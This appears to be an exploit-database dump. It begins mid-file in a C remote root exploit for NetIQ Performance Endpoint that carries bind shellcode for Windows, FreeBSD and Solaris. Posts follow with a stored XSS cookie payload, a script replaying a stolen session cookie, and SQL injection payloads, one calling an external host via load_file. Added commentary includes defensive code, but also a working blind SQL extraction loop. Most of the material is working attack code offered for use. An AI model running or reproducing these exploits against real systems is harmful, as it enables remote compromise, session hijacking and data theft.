  "\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
  "\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
  "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
  "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
  "\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
  "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
  "\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
  "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
  "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
  "\x91\xd0\x20\x08";

static char solaris_x86_bind[] =
  "\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
  "\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
  "\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
  "\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
  "\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
  "\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";

#define NUM_TARGETS 7

#define ARCH_X86 0
#define ARCH_SPARC 1

struct target_t {
  const char *name;
  const char *zshell;
  const int zshell_len;
  const int zshell_pkt_len;
  const int fp_indx;
  const int fp_offset;
  const int arch;
};

struct target_t targets[] = {
  { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - FreeBSD (universal)",
    freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
    solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
  { "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
    solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
  {0}
};

static const char *quotes[] = {
  " \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
  " to do something like 'run this command.' 100,000’s of endpoints have been\n"
  " installed worldwide without incident.\"",
  " \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
  " susceptible to 'buffer overrun' attacks used by hackers.\""
};

static int verbose = 1;   /* verbosity */
static int ppid, cpid;    /* parent and child process id's */

static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);

static void
fatal (void)
{
  kill (0, SIGKILL);
  exit (EXIT_FAILURE);
}

static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
  struct ifaddrs *ifa_head;
  int result;

  result = -1;
  if (getifaddrs (&ifa_head) == 0)
    {
      struct ifaddrs *ifa_cur;

      for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
        {
          if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
            {
              if (ifa_cur->ifa_addr->sa_family != AF_INET
                  || !(ifa_cur->ifa_flags & IFF_UP))
                continue;

              if (ifa_cur->ifa_flags & IFF_LOOPBACK)
                continue;

              memcpy (ip_addr,
                      &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
                      sizeof *ip_addr);
              result = 0;
              break;
            }
        }

      freeifaddrs (ifa_head);
    }

  return (result);
}

static int
sock_send (int fd, char *src, int len)
{
  int n;

  if ((n = send (fd, src, len, 0)) < 0)
    {
      perror ("send()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv (int fd, char *dst, int len)
{
  int n;

  if ((n = recv (fd, dst, len, 0)) < 0)
    {
      perror ("recv()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv_str (int fd, char *dst, int len)
{
  int n = sock_recv (fd, dst, len - 1);
  dst[n] = '\0';

  return (n);
}

static void
shellami (int fd)
{
  int n;
  fd_set rset;
  char rbuf[1024];

  while (1)
    {
      FD_ZERO (&rset);
      FD_SET (fd, &rset);
      FD_SET (STDIN_FILENO, &rset);

      if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
        {
          perror ("select()");
          fatal ();
        }

      if (FD_ISSET (fd, &rset))
        {
          if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
            {
              fprintf (stderr, "Connection closed by foreign host.\n");
              exit (EXIT_SUCCESS);
            }

          printf ("%s", rbuf);
          fflush (stdout);
        }

      if (FD_ISSET (STDIN_FILENO, &rset))
        {
          if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
            {
              rbuf[n] = '\0';
              sock_send (fd, rbuf, n);
            }
        }
    }
}

static int
sockami (char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int fd;

  fflush (stdout);
  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket()");
      exit (EXIT_FAILURE);
    }

  if ((hp = gethostbyname (host)) == NULL)
    {
      perror ("gethostbyname()");
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof (address));
  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);

  address.sin_family = AF_INET;
  address.sin_port = htons (port);

  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
    {
      perror ("connect()");
      return (-1);
    }

  return (fd);
}

int
endpt_add_string (char *buf, char *str)
{
  unsigned int str_len;
  unsigned short str_lens;

  assert (buf != NULL && str != NULL);

  str_len = 2 + strlen (str) + 1;
  str_lens = htons (str_len);

  /* add the string length and copy, including NULL */
  *((unsigned short *) buf) = str_lens;
  memcpy (buf + 2, str, str_len - 2);

  return (str_len);
}

char *
endpt_read_packet (int fd, char *buf)
{
  unsigned short pkt_len;
  int n;

  n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
  if (n < 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading length!\n");
      return (NULL);
    }

  pkt_len = ntohs (pkt_len);
  if (pkt_len > ENDPT_PKTMAX)
    {
      fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
      return (NULL);
    }

  n = sock_recv (fd, buf, pkt_len - 2);
  if (n < pkt_len - 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n",
               n, pkt_len);
      return (NULL);
    }

  return (buf);
}

char *
endpt_create_packet (char *buf, unsigned int len)
{
  char *pkt_buf;
  unsigned int pkt_len;
  unsigned short pkt_lens;

  assert (buf != NULL && len > 0);
  assert (len <= UINT_MAX - 2);
  assert (len <= ENDPT_PKTMAX - 2);

  pkt_len = 2 + len;
  pkt_buf = malloc (pkt_len * sizeof (char));
  if (pkt_buf == NULL)
    return (NULL);

  pkt_lens = htons (pkt_len);

  /* add the packet length and copy */
  *((unsigned short *) pkt_buf) = pkt_lens;
  memcpy (pkt_buf + 2, buf, len);

  return (pkt_buf);
}

void
endpt_listen_child (char *thost, struct target_t *trgt)
{
  struct sockaddr_in servaddr, cliaddr;
  char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
  unsigned int var_30_ptr;
  int lfd, cfd, sfd, pid;
  socklen_t clilen;

  sleep (1);
  pid = getpid ();

  if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      fatal ();
    }

  memset (&servaddr, 0, sizeof servaddr);
  servaddr.sin_family = AF_INET;
  servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
  servaddr.sin_port = htons (ENDPT_TCP_PORT);

  if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
    {
      perror ("bind()");
      fatal ();
    }

  if (listen (lfd, 2) < 0)
    {
      perror ("listen()");
      fatal ();
    }

  clilen = sizeof cliaddr;
  if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
    {
      perror ("accept()");
      fatal ();
    }

  printf ("[child-%d] connection accepted from %s:%d\n", pid,
          inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));

  printf ("[child-%d] reading first packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] sending first reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);
  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] reading second packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading third packet...", pid);
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] reading fourth packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading fifth packet...", pid);
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] sending second reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);
  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] sending evil buffer...", pid);
  ptr = pkt_buf;
  if (trgt->arch == ARCH_X86)
    {
      memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
      ptr += sizeof x86_evil_len - 1;
      memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
    }
  else if (trgt->arch == ARCH_SPARC)
    {
      int i;

      for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
        memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);
      for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
        memcpy (ptr, sparc_nop, sizeof sparc_nop);
    }
  else
    {
      fprintf (stderr, "opps\n");
      exit (EXIT_FAILURE);
    }

  memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
  sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
  printf ("done\n");

  printf ("[child-%d] sending hammer buffer...", pid);
  ptr = pkt_buf;
  memcpy (ptr, hammer_buf, sizeof hammer_buf);
  memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);

  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = ntohl (var_30_ptr);
  var_30_ptr -= trgt->fp_offset - 0x08;
  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = htonl (var_30_ptr);

  memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
  sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
  printf ("done\n");

  printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
  sleep (3);

  if ((sfd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (sfd);
    }

  sleep (1);
  close (cfd);
}

void
endpt_parent (char *thost)
{
  struct in_addr ip_addr;
  char ip_buf[IPV4_BUFLEN],
```
pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; int fd; get_localip_getifaddrs (&ip_addr.s_addr); strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf); ip_buf[sizeof ip_buf - 1] = '\0'; if (verbose) fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf); fflush (stdout); printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT); if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0) fatal (); printf ("done\n"); printf ("[parent-%d] building first packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1); ptr += sizeof ppkt_buf1 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end); ptr += sizeof ppkt_buf1_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); printf ("[parent-%d] building second packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2); ptr += sizeof ppkt_buf2 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end); ptr += sizeof ppkt_buf2_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); printf ("[parent-%d] building third packet...done\n", ppid); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); sleep (2); printf ("[parent-%d] closing socket...done\n", ppid); close (fd); } int main (int argc, char **argv) { struct target_t *trgt; int i, cret; printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n" "by: <[email protected]>\n" "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); if (argc <= 2) { fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]); for (i = 0; targets[i].name; i++) fprintf (stderr, "\t%d) %s\n", i, targets[i].name); fprintf (stderr, "\n"); exit (EXIT_SUCCESS); } if (atoi (argv[2]) >= NUM_TARGETS) { fprintf (stderr, "Only %d targets known!!\n", 
NUM_TARGETS); exit (EXIT_SUCCESS); } trgt = &targets[atoi (argv[2])]; printf ("Target: %s\n\n", trgt->name); srand (time (NULL)); printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]); ppid = getpid (); if ((cpid = fork ()) < 0) { perror ("fark()"); exit (EXIT_FAILURE); } else if (cpid == 0) { /* child */ endpt_listen_child (argv[1], trgt); exit (EXIT_SUCCESS); } /* parent */ endpt_parent (argv[1]); /* wait for child */ wait (&cret); if (verbose) fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret); return (EXIT_SUCCESS); }
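The exploit above speaks the endpoint's framing through three helpers: endpt_create_packet() prefixes a body with a 2-byte big-endian length that counts itself, endpt_add_string() encodes a string field as a 2-byte length covering the length, the text and a trailing NUL, and endpt_read_packet() reads a length and then the rest, refusing anything above ENDPT_PKTMAX. The following is an added, stand-alone re-implementation of that framing (not code from the exploit or from NetIQ) that builds and parses packets over in-memory byte strings; ENDPT_PKTMAX is an assumed value because the real #define is not reproduced in this excerpt. It also rejects a declared length below 2, which the C reader as written would pass to recv() as a negative count.

```python
import struct

# Assumed cap for one packet; the exploit's ENDPT_PKTMAX #define is not
# reproduced in this excerpt, so this value is a placeholder.
ENDPT_PKTMAX = 4096


def create_packet(body):
    """Frame a body the way endpt_create_packet() does: a 2-byte big-endian
    length that counts itself, followed by the body."""
    if not body:
        raise ValueError("empty body")
    total = 2 + len(body)
    if total > ENDPT_PKTMAX:
        raise ValueError("body too large for one packet")
    return struct.pack(">H", total) + body


def add_string(text):
    """Encode a string field the way endpt_add_string() does: a 2-byte
    big-endian length covering the length field, the text and a NUL."""
    raw = text.encode("ascii") + b"\x00"
    return struct.pack(">H", 2 + len(raw)) + raw


def read_packet(stream):
    """Consume one packet from an in-memory byte stream and return
    (body, remaining). Mirrors endpt_read_packet(), but also rejects a
    declared length below 2, which the C code would turn into a negative
    recv() count."""
    if len(stream) < 2:
        raise ValueError("failed reading length")
    (total,) = struct.unpack(">H", stream[:2])
    if total < 2 or total > ENDPT_PKTMAX:
        raise ValueError("invalid packet length %d" % total)
    if len(stream) < total:
        raise ValueError("failed reading packet (%d read, need %d)"
                         % (len(stream) - 2, total))
    return stream[2:total], stream[total:]


def parse_string(body, offset=0):
    """Decode one string field at body[offset:]; returns (text, next_offset)."""
    if offset + 2 > len(body):
        raise ValueError("truncated string length")
    (slen,) = struct.unpack(">H", body[offset:offset + 2])
    end = offset + slen
    if slen < 3 or end > len(body) or body[end - 1] != 0:
        raise ValueError("malformed string field")
    return body[offset + 2:end - 1].decode("ascii"), end


if __name__ == "__main__":
    # Constructed example: a packet carrying only a connect-back address.
    pkt = create_packet(add_string("10.0.0.1"))
    body, rest = read_packet(pkt)
    print(pkt.hex(), parse_string(body))
```

Because the outer length includes its own two bytes, a body of N bytes is announced as N + 2; the two checks in read_packet() are the ones a listener that accepts packets from an untrusted peer needs before trusting that number.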
12. # Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
# Date: 12/09/2022
# Exploit Author: Rob, CTRL Group
# Vendor Homepage: marigroup.com
# Version: V3.3.3 and under
# Tested on: Windows IIS all versions
# CVE : CVE-2022-35543

"Stored Cross-Site Scripting" vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication; however, once the payload is stored, any user visiting the portal will trigger the alert.

Login to the application.
Browse to the "Settings" tab and then "Wards".
Create a new ward with the following payload as the ward name:
<script>alert(document.cookie)</script>
Any user browsing the application will trigger the payload.
13. ## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute
## Author: nu11secur1ty
## Date: 01.11.2023
## Vendor: https://pimcore.com/en
## Software: https://packagist.org/packages/pimcore/skeleton
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton

## Description:
The pimCore-5.4.18-skeleton suffers from a Sensitive Cookie with Improper SameSite Attribute vulnerability: PHPSESSID cookie session management connection requests are not sanitized correctly. There are no securing changes to the PHPSESSID cookie for every request (validating sessions and changing the cookie for every connection / POST request). An attacker on the same network can trick the user (the administrator of this system) and steal his cookie; then he can do very evil things using the same session in the name of the already authenticated user (the administrator), on a couple of PCs with different IPs which are used from different machines in that network. When the attacker steals the cookie, he can manipulate the same session; for example, he can log out or do very malicious stuff. This is a very stupid developer's error, and this can be very dangerous for the owner of the system. The attack is also possible from an external network!

## STATUS: HIGH Vulnerability

[+] Payload:

```Python
#!/usr/bin/python3
# @nu11secur1ty 2023
import time
from selenium import webdriver

driver = webdriver.Chrome()

print("Give the stolen cookie...\n")
cookie = input()
print("Give the domain or IP of the owner of the cookie...\n")
target = input()

driver.maximize_window()
driver.get(target + 'admin/?_dc=1673370965&perspective=')
driver.add_cookie({'name': 'PHPSESSID', 'value': cookie})
print(driver.get_cookie('PHPSESSID'))
driver.get(target + 'admin/?_dc=1673370965&perspective=')
time.sleep(3)
print("Press any key to stop the exploit...\n")
input()
print("Your PHPSESSID is PWNED")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton)

## Reference:
[href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)

## Proof and Exploit:
[href](https://streamable.com/lorw8x)

## Time spent
`03:00:00`

## Writing an exploit
`00:25:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
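The post above is about a session cookie issued without protective attributes. What a reviewer actually checks is the Set-Cookie header: Secure (never sent over plain HTTP, which is what a same-network attacker sniffs), HttpOnly (not readable by injected script) and a restrictive SameSite (not attached to cross-site requests). The following added example (not part of the post or of Pimcore; the sample header is constructed) audits a Set-Cookie value for those three attributes and re-emits a hardened one. Note the limits: these attributes stop a cookie being stolen over the wire or by script and replayed cross-site, but a value already captured elsewhere is still valid until the server invalidates the session.

```python
# Constructed sample of a weak session cookie, modelled on the PHPSESSID
# cookie discussed above; the value is made up.
SAMPLE_WEAK = "PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; Path=/"


def parse_set_cookie(header):
    """Split a Set-Cookie header value into (name, value, attrs); attribute
    names are lower-cased, flag attributes (Secure, HttpOnly) map to None."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else None
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header):
    """Return the weaknesses found in a session cookie, in the order checked.
    An empty list means Secure, HttpOnly and a restrictive SameSite are set."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP, so a network attacker can read it")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by injected script")
    samesite = (attrs.get("samesite") or "").lower()
    if samesite not in ("lax", "strict"):
        findings.append("SameSite=%s: cross-site requests still carry the session"
                        % (samesite or "absent"))
    return findings


def harden_set_cookie(header, samesite="Lax"):
    """Re-emit the cookie with Secure, HttpOnly and SameSite, keeping Path/Domain."""
    name, value, attrs = parse_set_cookie(header)
    out = ["%s=%s" % (name, value)]
    for keep in ("path", "domain"):
        if attrs.get(keep):
            out.append("%s=%s" % (keep.capitalize(), attrs[keep]))
    out.append("SameSite=%s" % samesite)
    out.extend(["Secure", "HttpOnly"])
    return "; ".join(out)


if __name__ == "__main__":
    for finding in audit_session_cookie(SAMPLE_WEAK):
        print("-", finding)
    print(harden_set_cookie(SAMPLE_WEAK))
```

Run it against a captured Set-Cookie line; SameSite=Strict is the stricter choice when the admin UI is never entered from a cross-site link.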
14. ## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi

## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Payload:

```MySQL
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND (SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```

[+] Online:

```MySQL
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- -
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)

## Proof and Exploit:
[href](https://streamable.com/7x69yz)

## Time spent
`01:30:00`

## Writing an exploit
`00:05:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
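The sqlmap payloads above all start with a quote followed by WHERE, which is the signature of a User-Agent value being concatenated into an UPDATE whose own WHERE clause then gets commented out. The following added example (not ChiKoi code; the schema and rows are constructed, and SQLite stands in for MySQL) reproduces that shape: a visitor log written with string formatting, the parameterized version that fixes it, and a boolean-blind extraction loop that uses the affected row count as its oracle, the same idea sqlmap's "boolean-based blind" technique relies on. The MySQL-specific error oracle (the UNION subquery in the ELSE branch) is replaced by a plain CASE because SQLite does not raise on a multi-row scalar subquery.

```python
import sqlite3


def make_db():
    """Constructed sample data: a visitor log keyed by session plus a table
    the attacker wants to read. Nothing here comes from the ChiKoi code base."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (id INTEGER PRIMARY KEY, user_agent TEXT)")
    db.executemany("INSERT INTO sessions VALUES (?, ?)",
                   [(1, "Mozilla/5.0"), (2, "curl/7.88.1"), (3, "Mozilla/5.0")])
    db.execute("CREATE TABLE admins (login TEXT, secret TEXT)")
    db.execute("INSERT INTO admins VALUES ('root', 's3cr3t')")
    db.commit()
    return db


def record_ua_vulnerable(db, session_id, user_agent):
    """The flaw: the header value is spliced into the statement text, so a
    quote in it rewrites the UPDATE. Returns the number of rows touched."""
    sql = "UPDATE sessions SET user_agent = '%s' WHERE id = %d" % (user_agent, session_id)
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def record_ua_safe(db, session_id, user_agent):
    """The fix: the header value travels as a bound parameter and is never
    parsed as SQL, whatever characters it contains."""
    cur = db.execute("UPDATE sessions SET user_agent = ? WHERE id = ?",
                     (user_agent, session_id))
    db.commit()
    return cur.rowcount


def blind_extract(db, subquery, max_len=32):
    """Boolean-based blind extraction through the User-Agent, one character
    per guess: the injected WHERE replaces the original one, so a true
    condition updates every row and a false one updates none."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):
            cond = "unicode(substr((%s), %d, 1)) = %d" % (subquery, pos, code)
            payload = "x' WHERE %s -- -" % cond
            if record_ua_vulnerable(db, 1, payload) > 0:
                hit = chr(code)
                break
        if hit is None:   # substr() past the end yields '' -> NULL -> no rows
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    print(blind_extract(make_db(), "SELECT secret FROM admins WHERE login = 'root'"))
```

The rowcount oracle is noisier in a real web application (it shows up as a different response or timing rather than a number), but the control flow is the same: one request per candidate character, and the fix is identical, bind the header value instead of formatting it into the query.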
15. ## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation
## Author: nu11secur1ty
## Date: 01.13.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/software-download/windows11
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752

## Description:
Windows 11 Pro build 10.0.22000 Build 22000 suffers from a Backup service Privilege Escalation vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges and could delete data, including data that results in the service being unavailable.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752)

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)

## Proof and Exploit:
[href](https://streamable.com/f2dl3m)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
